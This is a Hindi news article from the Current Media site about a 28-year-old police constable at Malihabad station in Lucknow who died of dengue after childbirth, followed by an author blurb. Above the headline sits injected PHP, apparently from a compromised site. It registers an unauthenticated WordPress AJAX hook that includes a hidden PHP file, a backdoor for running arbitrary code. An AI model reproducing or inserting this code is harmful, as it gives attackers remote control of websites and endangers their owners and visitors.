if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }डेंगू ने ली मलिहाबाद कोतवाली में तैनात महिला आरक्षी की जान - Current Media
मृतका पूजा सक्सेना का फोटो

डेंगू ने ली मलिहाबाद कोतवाली में तैनात महिला आरक्षी की जान

मलिहाबाद/लखनऊ । शहज़ाद अहमद खान। मलिहाबाद कोतवाली में तैनात आरक्षी पूजा सक्सेना (28) की डेंगू वायरल के चलते मौत हो गई। वह बरेली जनपद के एक निजी अस्पताल में भर्ती थी। आरक्षी की मौत की सूचना मिलते ही सहकर्मी पुलिसकर्मियों ने दो मिनट का मौन रखकर दिवंगत आरक्षी को श्रद्धांजलि दी है। पूजा करीब दो वर्षों से मलिहाबाद कोतवाली में तैनात थी।

मूलरूप से बरेली जनपद की रहने वाली पूजा 2019 बैच की आरक्षी थी। उनकी पहली पोस्टिंग लखनऊ जनपद के निगोंहा थाने में थी। करीब दो वर्ष पूर्व निगोहां थाने से मलिहाबाद कोतवाली में उसका स्थानातंरण हुआ था। प्रभारी निरीक्षक सुरेश सिंह ने बताया कि पूजा मलिहाबाद परिसर में बने महिला आरक्षी बैरक में रहती थी। उनकी शादी शाहजहांपुर जनपद के सेहरामऊ निवासी अंकित सक्सेना से हुई थी। सुरेश सिंह ने बताया कि 18 सितम्बर को पूजा मैटरनिटी लीव लेकर गृह जनपद बरेली गई थी। 11 सितम्बर को पूजा ने एक बेटे को जन्म दिया।इसके बाद उसकी सेहत धीरे-धीरे बिगड़ने लगी। पति अंकित सक्सेना ने बताया कि तबीयत बिगड़ने पर पूजा को निजी अस्पताल में भर्ती कराया गया। मेडिकल रिपोर्ट में डेंगू वायरस की पुष्टि हुई।गुरुवार देर रात अस्पताल में भर्ती आरक्षी पूजा की इलाज के दौरान मौत हो गई।

श्रद्धांजलि देते हुए मलिहाबाद कोतवाली के पुलिसकर्मी

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

संयुक्त राष्ट्र सतत विकास लक्ष्यों में उत्कृष्ट योगदान के लिए ‘वायरसडीज़ीज़’ जर्नल सम्मानित

लखनऊ। मो0 ज़ाहिद । स्प्रिंगर नेचर द्वारा प्रकाशित अंतरराष्ट्रीय पीयर-रिव्यूड जर्नल इंडियान वायरोलॉजिकल सोसाइटी केे …